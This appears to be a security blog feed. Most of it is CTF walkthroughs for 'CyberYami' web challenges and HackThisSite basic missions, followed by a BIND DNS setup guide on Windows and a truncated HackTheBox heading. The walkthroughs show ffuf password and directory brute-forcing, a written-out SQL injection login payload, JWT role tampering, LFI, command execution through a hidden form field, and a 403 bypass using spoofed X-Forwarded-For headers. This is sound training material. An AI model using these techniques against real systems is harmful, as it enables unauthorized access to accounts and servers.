http://3.7.252.130/Antique_cafe/css/tailwind.css => T_th3M

The fourth and last part of the flag is in the parallax.min.js file.

http://3.7.252.130/Antique_cafe/js/parallax.min.js => _4ll!!!}

Flag: CyberYami{Y0u__g0T_th3M_4ll!!!}

Kevin

URL: http://3.7.252.130/Kevin/
Point: +30
Description: Postman cames and ….

As the description highlights the Post, we just have to make a POST request to the challenge URL.

Flag: CyberYami{K3v1n_tH3_h4cK3r}

URL: http://13.201.47.7/Login1/
Point: 30
Description: Just login, That’s it.

It is just one simple login page. After trying different injection techniques, nothing worked, so let’s use the last resort Brute Force.

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -H 'Content-Type: application/x-www-form-urlencoded' -d 'u=admin&p=FUZZ' -w D:\Tools\wordlist\web\SecLists-2024.3\Passwords\Leaked-Databases\rockyou-50.txt -u 'http://13.201.47.7/Login1/' -fr 'Invalid username or password.'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://13.201.47.7/Login1/
 :: Wordlist         : FUZZ: D:\Tools\wordlist\web\SecLists-2024.3\Passwords\Leaked-Databases\rockyou-50.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : u=admin&p=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Invalid username or password.
________________________________________________

password123             [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]ors: 0 ::
:: Progress: [9436/9436] :: Job [1/1] :: 312 req/sec :: Duration: [0:00:18] :: Errors: 0 ::

We found a valid password. when we login using admin:password123. We get the flag.

Flag: CyberYami{congr4ts_y0u_l0gg3d_1n_succ3s5fully}

URL: http://3.7.252.130/Login2/index.php
Point: 50
Description: Really just login, That’s it.

This is like the previous login challenge, so let’s brute force again!

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=FUZZ' -w D:\Tools\wordlist\web\SecLists-2024.3\Passwords\Leaked-Databases\rockyou-50.txt -u 'http://3.7.252.130/Login2/index.php' -fr 'Invalid username or password.'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://3.7.252.130/Login2/index.php
 :: Wordlist         : FUZZ: D:\Tools\wordlist\web\SecLists-2024.3\Passwords\Leaked-Databases\rockyou-50.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=admin&password=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Invalid username or password.
________________________________________________

iloveyou                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]ors: 0 ::
:: Progress: [9436/9436] :: Job [1/1] :: 275 req/sec :: Duration: [0:00:46] :: Errors: 0 ::

We are able to login using these credentials, but when we login, we don’t see the flag. We also notice one extra cookie: admin=False. So let’s change it to true. And we get the flag.

Flag: CyberYami{4dmin_4cce55_gr4nt3d}

Photo Gallery

URL: http://3.7.252.130/PhotoGallery/
Points: +50
Description: We have lot of photos.

Here we have 8 photos that can be accessed in two ways. challenge.php?photo=1 or photos/1.jpg

The directory listing is enabled for /photos/ and there are only 8 images. This photo GET parameter looks interesting. After trying a bunch of injections, parameter and method/verb tempering techniques, I couldn’t find anything, so let’s do brute force (again!) for this photos GET parameter ID value.

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ seq 1 100 > id.txt

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -u 'http://3.7.252.130/PhotoGallery/challenge.php?photo=FUZZ' -w id.txt -fr 'Invalid photo number.'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://3.7.252.130/PhotoGallery/challenge.php?photo=FUZZ
 :: Wordlist         : FUZZ: C:\Users\Jack\Downloads\id.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Invalid photo number.
________________________________________________

9                       [Status: 200, Size: 22, Words: 6, Lines: 1, Duration: 44ms]::
87                      [Status: 200, Size: 101, Words: 11, Lines: 1, Duration: 94ms]:
8                       [Status: 200, Size: 1032907, Words: 5314, Lines: 4480, Duration: 49ms]
2                       [Status: 200, Size: 1000983, Words: 2853, Lines: 3423, Duration: 28ms]
4                       [Status: 200, Size: 871578, Words: 3216, Lines: 3317, Duration: 49ms]
5                       [Status: 200, Size: 1292467, Words: 5772, Lines: 5229, Duration: 51ms]
3                       [Status: 200, Size: 1317021, Words: 5095, Lines: 5358, Duration: 52ms]
1                       [Status: 200, Size: 1448290, Words: 5456, Lines: 5991, Duration: 36ms]
6                       [Status: 200, Size: 1235823, Words: 4555, Lines: 4155, Duration: 52ms]
7                       [Status: 200, Size: 2176221, Words: 11245, Lines: 9070, Duration: 49ms]
:: Progress: [100/100] :: Job [1/1] :: 24 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

We found one new value: 87. It will return the flag.

Flag: CyberYami{Y0u_f0und_th3_h1dd3n_ph0t0}

Snacks

URL: http://3.7.252.130/Snacks
Points: +50
Description: Hmm Yummy.

This website is pretty much static. But the following three JavaScript files look interesting because they contain obfuscated JS code.

We can use online deobfuscator tools like https://deobfuscate.relative.im/ to deobfuscate the JavaScript code.

After deobfuscating the http://3.7.252.130/Snacks/js/min-1.11.0.js file, we get the following:

function ObjectP() {
  var _0x8b8fd3 = String.fromCharCode(67, 121, 98, 101, 114, 89, 97)
}

We can use browser DevTool’s console page to decode this.

deobfuscated code of http://3.7.252.130/Snacks/js/min-1.12.1.js file:

function ObjectP() {
  var _0x53a201 = String.fromCharCode(109, 105, 123, 74, 52, 118, 52)
}

deobfuscated code of http://3.7.252.130/Snacks/js/min-2.1.0.js file:

function ObjectP() {
  var _0x59964d = atob('NWNyMXB0XzBiZnU1YzR0MTBuISF9')
}

Flag: CyberYami{J4v45cr1pt_0bfu5c4t10n!!}

URL: http://3.7.252.130/Login3/
Points: +50
Description: Ok, Not just login.

This time we again do brute force to get the login credentials, but the admin username doesn’t work, so we also need to brute force username.

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=USERFUZZ&password=PASSFUZZ' -w D:\Tools\wordlist\web\SecLists-2024.3\Usernames\top-usernames-shortlist.txt:USERFUZZ -w D:\Tools\wordlist\web\SecLists-2024.3\Passwords\Default-Credentials\default-passwords.txt:PASSFUZZ -u 'http://3.7.252.130/Login3/' -fr 'Invalid login credentials!'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://3.7.252.130/Login3/
 :: Wordlist         : USERFUZZ: D:\Tools\wordlist\web\SecLists-2024.3\Usernames\top-usernames-shortlist.txt
 :: Wordlist         : PASSFUZZ: D:\Tools\wordlist\web\SecLists-2024.3\Passwords\Default-Credentials\default-passwords.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=USERFUZZ&password=PASSFUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Invalid login credentials!
________________________________________________

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]Duration: [0:01:17] :: Errors: 0 ::
    * PASSFUZZ: password
    * USERFUZZ: guest

:: Progress: [22338/22338] :: Job [1/1] :: 385 req/sec :: Duration: [0:01:19] :: Errors: 0 ::

We can login using guest:password.

We notice one new JWT cookie after successful login. In that our role is user we can just change it admin and base64 encode it again; and it will be accepted. The JWT signature is not being verified.

Flag: CyberYami{JWT_N0n3_Alg0r1thm_Byp4ss}

ShopU

URL: http://3.7.252.130/ShopU
Points: 50
Description: We love ShopU :)

This site is static. So let’s do brute force to find some hidden pages.

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -u 'http://3.7.252.130/ShopU/FUZZ' -w $wordlist_good

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://3.7.252.130/ShopU/FUZZ
 :: Wordlist         : FUZZ: D:\Tools\wordlist\web\good.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htpasswd               [Status: 200, Size: 18, Words: 1, Lines: 1, Duration: 21ms]0 ::
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 33ms] 1 ::
/.htpasswd              [Status: 200, Size: 18, Words: 1, Lines: 1, Duration: 30ms]rs: 1 ::
:: Progress: [4193/4193] :: Job [1/1] :: 145 req/sec :: Duration: [0:00:28] :: Errors: 1 ::

The .htpasswd file is accessible, which leads to the flag.

Flag: CyberYami{G0t_Th3_S3cr3t_Fl4g!!!}

Restaurant

URL: http://3.7.252.130/Restaurant
Points: 50
Description: It’s very famous restaurant.

Clicking on Order Now we see one POST request with empty order= data.

If we enter any non-empty value in the ordder POST parameter, we see one extra header, X-Char: which is returning one flag character at a time.

We can write a simple script to get the entire flag.

1..31 | ForEach-Object {
Write-Host -NoNewline $(curl -si http://3.7.252.130/Restaurant/ -d 'order=x' -b 'PHPSESSID=4v2smlksuud8e5a93p6794q30f' | grep -oP '(?<=X-Char: ).')
}

Flag: CyberYami{Ch4r_By_Ch4r_Exfil@@}

Yami

URL: http://3.7.252.130:8080/
Points: +100
Description: We have started new food business.

In the menu.jsp page we have a very simple and clear LFI.

In the about.jsp page, we notice one comment related to flag.

http://3.7.252.130:8080/about.jsp =>

Now we know that the Flag is in flag (not flag.txt). and by reading the source code of menu.jsp we know that we are in /usr/local/tomcat/webapps/ROOT/menu directory.

After some trial and error and searching some well-known Linux directories, we found our flag in the /var/www/ directory.

Flag: CyberYami{lF1_3xpl01t_5uCce5s!!}

URL: http://3.7.252.130:8081/
Points: +50
Description: Again login, That’s it.

This login form is vulnerable to SQLi. We can login using a payload like admin' or '1'='1.

Flag: CyberYami{5ql_1nj3ct1on_suCc3ssFul$$--;-}

URL: http://3.7.252.130/Login5/
Points: +50
Description: I’m back with one more login.

This time we notice obfuscated code in the JavaScript file. Let’s deobfuscate it using https://deobfuscate.relative.im/. We get the following code:

document
  .getElementById('login-form')
  .addEventListener('submit', function (_0x5170d8) {
    _0x5170d8.preventDefault()
    var _0x297c57 = 'hidden_user',
      _0x455914 = 'super_hidden_password ',
      _0x4f9d8a = document.getElementById('username').value,
      _0x969523 = document.getElementById('password').value
    _0x4f9d8a === _0x297c57 && _0x969523 === _0x455914
      ? fetch('verify.php', {
          method: 'POST',
          headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
          body: new URLSearchParams({
            username: _0x4f9d8a,
            password: _0x969523,
          }),
        })
          .then((_0x1233c0) => _0x1233c0.json())
          .then((_0xf8f4a4) => {
            _0xf8f4a4.status === 'success'
              ? (document.getElementById('message').innerHTML =
                  'Flag: ' + _0xf8f4a4.flag)
              : (document.getElementById('message').innerHTML =
                  'Invalid credentials!')
          })
      : (document.getElementById('message').innerHTML = 'Invalid credentials!')
  })

We found the username = 'hidden_user' and password = 'super_hidden_password '. Don’t miss the space at last in the password!

When we try to login using these credentials, we get the flag.

Flag: CyberYami{tH3_h1dd3n_fl4g_1s_h3r3}

Healet

URL: http://3.7.252.130/Healet
Points: +30
Description: Jewellery shop.

When we visit the challenge page, we notice a strange response header called X-Ses.

This looks like a hexadecimal number. We obtain the flag by decoding it from hex.

Flag: CyberYami{h34D3r_fL4G_!!}

Pill

URL: http://3.7.252.130/Pill
Points: +30
Description: Take your pill.

We are offered the choice of selecting a pill from red or blue.

The selected pill is submitted using the GET parameter pill=red. Let’s see what additional colors are available.

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -u 'http://3.7.252.130/Pill/?pill=FUZZ' -w colors-list.txt -fr 'Invalid pill selection!'

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://3.7.252.130/Pill/?pill=FUZZ
 :: Wordlist         : FUZZ: C:\Users\Jack\Downloads\colors-list.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Invalid pill selection!
________________________________________________

purple                  [Status: 200, Size: 1517, Words: 456, Lines: 55, Duration: 23ms]
red                     [Status: 200, Size: 1494, Words: 456, Lines: 55, Duration: 28ms]
blue                    [Status: 200, Size: 1495, Words: 456, Lines: 55, Duration: 5826ms]
:: Progress: [166/166] :: Job [1/1] :: 16 req/sec :: Duration: [0:00:10] :: Errors: 0 ::

The newly discovered purple pill returns the flag.

Flag: CyberYami{Purpl3_p1ll_fl4g_1234$}

Carvilla

URL: http://3.7.252.130/Carvilla/
Points: 30
Description: Cars services.

There is no input on this static webpage. A strange cookie called "_ma" is being set.

It is a base32-encoded string. Decoding it with base32 will reveal the flag.

Flag: CyberYami{C00K1E_c00k1e_123$$}

CYShell

URL: http://13.201.47.7:8080/
Points: +100
Description: Our famous bot.

When we click the submit button in Commands.php, we get output similar to uname on Linux. Checking the source code, we find one hidden form field with the name="cmd" and value="uname -a".

This seems quite interesting. Let’s see whether we can run our commands.

Okay, now we have RCE. Let us find the flag. In the HTML source code of the home page, there is one comment which indicates the location of the flag file.

We now know that the flag is located in '/flag.txt', but we can’t print it using cat. Perhaps some protections are in place, but we can use other utilities, such as base64, to return the encoded file, possibly evading them.

Flag: CyberYami{N0t_S0_MucH_53cur3!}

Denied

URL: http://3.7.252.130:8083/
Points: 100
Description: CyberYami IT Solutions.

This is a static website. There is only one form field, and it is not injectable. So, let’s look for any hidden directories.

┌──PS(Aftab@Sama)-[~\Downloads]
└─$ ffuf -u 'http://3.7.252.130:8083/FUZZ' -w $wordlist_good

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://3.7.252.130:8083/FUZZ
 :: Wordlist         : FUZZ: D:\Tools\wordlist\web\good.txt
 :: Header           : User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

/admin/config.php       [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 33ms]
//admin/config.php      [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 32ms]
.htaccess.save          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]:
.htpasswd               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]::
.htaccess-marco         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]::
.htpasswrd              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]0 ::
.htusers                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]0 ::
.htpasswds              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]0 ::
.htpasswd_test          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]0 ::
.htaccess-dev           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]0 ::
.ht_wsr.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]0 ::
.htpasswd-old           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]0 ::
.htpasswd.inc           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]0 ::
.htaccess.old           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]0 ::
.htaccess_orig          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 28ms]1 ::
.htaccess_extra         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 33ms]1 ::
.htaccessOLD            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]1 ::
.htaccess.bak1          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 32ms]1 ::
.htaccess_sc            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]1 ::
.htaccessOLD2           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]1 ::
.htaccess~              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]1 ::
.htaccess               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms]1 ::
.htaccess.inc           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]1 ::
.httpie/                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]1 ::
.htaccessBAK            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]1 ::
.htgroup                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 27ms]1 ::
.httr-oauth             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms]1 ::
.htaccess.txt           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]1 ::
.htaccess-local         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]1 ::
.htpasswd.bak           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms] 1 ::
.hta                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
.htaccess.orig          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
.htaccess.sample        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms] 1 ::
.htaccess/              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 32ms] 1 ::
.htpasswd/              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 23ms] 1 ::
.htaccess.bak           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
//admin/.env            [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 30ms]1 ::
/admin/.env             [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 31ms]1 ::
/admin/.git/config      [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 30ms]1 ::
/.htaccessOLD           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms] 1 ::
/.htaccess-marco        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms] 1 ::
/.htaccess.BAK          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms] 1 ::
/.htpasswd_test         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms] 1 ::
/.htaccess-local        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms] 1 ::
/.htaccessBAK           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htaccess.bak1         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 42ms] 1 ::
/.htaccess_extra        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 37ms]
/.htaccess/             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 32ms] 1 ::
/.htaccess_orig         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 41ms] 1 ::
/.htgroup               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 41ms]
/.htaccess.sample       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htaccess~             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 43ms] 1 ::
/.htaccess              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 33ms]
/.htaccess.save         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 36ms] 1 ::
/.htaccessOLD2          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htpasswrd             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 32ms] 1 ::
/.htaccess.bak          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 38ms] 1 ::
/.htpasswd.inc          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htpasswd              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms] 1 ::
/.htpasswds             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htpasswd-old          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htaccess.orig         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 38ms] 1 ::
/.htaccess.old          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 37ms] 1 ::
/.htaccess_sc           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htaccess.inc          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 31ms] 1 ::
/.htaccess-dev          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms] 1 ::
/.htaccess.swp          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms] 1 ::
/.htpasswd.bak          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms] 1 ::
/.htpasswd/             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms] 1 ::
/.htaccess.txt          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 33ms] 1 ::
/admin/phpmyadmin/      [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 31ms]1 ::
/admin/phpmyadmin2/     [Status: 403, Size: 962, Words: 170, Lines: 49, Duration: 37ms]1 ::
:: Progress: [4193/4193] :: Job [1/1] :: 151 req/sec :: Duration: [0:00:28] :: Errors: 1 ::

We receive a large number of 403 pages, but one thing stands out: the response size for the /admin directory differs from others.

The challenge name ‘Denied’ additionally hints that we must bypass this 403. After attempting various path-based mutations and IP-based headers, certain headers such as "X-Forwarded-For" and "Client-IP" successfully bypassed the 403 error and returned the flag in the response.

Flag: CyberYami{Y0U_R34lLy_kN0w_h0W_to_T4ckL3!!!}

Unfound

URL: http://3.7.252.130:8084/
Points: 100
Description: Bad API getting error 404, can you make it correct.

We can see that it is sending a call to the “/api/getflag” endpoint from the HTML source code. When we visit the page, we receive the Access Denied message: “The content can’t be loaded in this browser”.

This message indicates that the response is browser dependent. But how does the server determine which type of browser is making the request? It uses the User-Agent header. curl is the most popular tool for making requests, so let’s use it to make a request to this endpoint.

We receive a different message. That’s a good sign. It is simply verifying if the word “curl” appears in the User-Agent header. We can verify this by sending a request with and without curl in the User-Agent field.

Note: The "-A" flag in curl is used to specify the User-Agent.

This message suggests that we must submit a post request that includes the secret:flag data.

We must specify the "Content-Type: application/json" header to send the JSON data in the POST request. If you remember the HTML source code that gave us the API path, it was using JSON to parse the response. Therefore, it follows that JSON format data must be sent.

Flag: CyberYami{Y0U_F0unD_1T_Th3_S3cr3t_4P1!}

Happy Hacking

Basic Challenge Level 11

Tue, 10 Sep 2024 10:36:30 +0000

Description: Not Available

Requirements: Not Available

Hints:

What is a directory index?
How does Apache keep users from seeing certain files within a directory?

Difficulty: Easy-ish.

Points: 55

Challenge Link: https://www.hackthissite.org/missions/basic/11

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10757

Solution:

By reloading the page, different Elton John songs are displayed.

When we navigate to the e/ directory, we notice that directory listing is enabled.

The .htaccess Apache configuration file is accessible in the last directory, e/l/t/o/n/.

There is a file named DaAnswer.

This is tricky, but the answer is simple.

We sumbit can simple as a password in index.php.

Happy Hacking

Basic Challenge Level 10

Mon, 09 Sep 2024 00:00:00 +0000

Description:

Although the challenge’s title mentions JavaScript, it’s not necessary (unless you’re using a browser from the ’90s)…

Requirements:

Basic knowledge of Cookies & knowing how to manipulate them with your browser.

Hints:

Take a look at the Cookies this challenge’s page saves in your browser.

Difficulty: Easy.

Points: 50

Challenge Link: https://www.hackthissite.org/missions/basic/10

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10756

Solution:

The challenge’s page is saving two cookies:

HackThisSite: used as a password
level10_authorized: set to no. So we change it to yes and submit the password that we got from the HackThisSite cookie.

Happy Hacking

Basic Challenge Level 9

Mon, 09 Sep 2024 00:00:00 +0000

Description:

Sam is going down with the ship. He’s determined to keep obscuring the password file, no matter how many times people manage to recover it. This time the file is saved in /var/www/hackthissite.org/html/missions/basic/9/.

In Basic 8, in his attempt to limit SSI to that challenge only, he mistakenly screwed up somewhere. There is a way to get the obscured Basic 9 password, see if you can figure out how…

Requirements:

SSI knowledge & UNIX directory structure understanding.

Hints:

Read the description carefully.
Look up “directory traversal”.

Difficulty: Easy.

Points: 45

Challenge Link: https://www.hackthissite.org/missions/basic/9

Forum Link:

https://www.hackthissite.org/forums/viewforum.php?f=14&t=10755

Solution:

Come back to level 8 and use the same payload to list files from the level 9 directory using ../../9.

We get the file named p91e283zc3.php, which contains the password 1f6aa876.

Happy Hacking

How to Setup BIND DNS Server on Windows

Wed, 04 Sep 2024 00:00:00 +0000

In this blog, we will install and configure the BIND DNS server on Windows. My motivation for this was to use a wildcard DNS record for a domain because the etc/hosts file doesn’t support wildcards.

Why BIND? Because BIND is the most commonly used DNS server software on the Internet and it is open-source software.

Installing BIND

Download Bind9 for windows

Download BIND for Windows from here:

ftp://ftp.isc.org/isc/bind9/9.16.50/BIND9.16.50.x64.zip

Installing BIND

Run the BINDInstall.exe as an administrator.
Enter the service account name and password.
If all goes well, you will see the message, BIND installation completed successfully.

Add BIND to your PATH

Add the Bind Installation Path/bin to the Path Environment Variable.

Set the correct filesystem permission

Right-click on the BIND installation folder, go to Properties > Security > Edit.
Click on Add.
Type the name of the service account name (e.g., named) you specified during installation.
Tick the Allow box for both Modify and Write.
Full control is not required (and, for security purposes, should not be granted).

Configuring BIND

Inside the BIND installation folder, create two directories: zones and logs.

BIND 9 uses a single configuration file called named.conf.

`etc/named.conf` file

include "C:\Program Files\ISC BIND 9\etc\named.conf.options";
include "C:\Program Files\ISC BIND 9\etc\named.conf.local";
include "C:\Program Files\ISC BIND 9\etc\named.conf.logging";

`etc/named.conf.local` file

zone "." {
  type hint;
  file "C:\Program Files\ISC BIND 9\zones\named.root";
};

zone "htb" {
     type master;
     file "C:\Program Files\ISC BIND 9\zones\htb.zone";
};

zone "oastify.com" {
     type master;
     file "C:\Program Files\ISC BIND 9\zones\burp.zone";
};

`etc/named.conf.logging` file

Click to see code:

No-Threshold - HackTheBox

Sun, 01 Sep 2024 00:00:00 +0000

Challenge Description

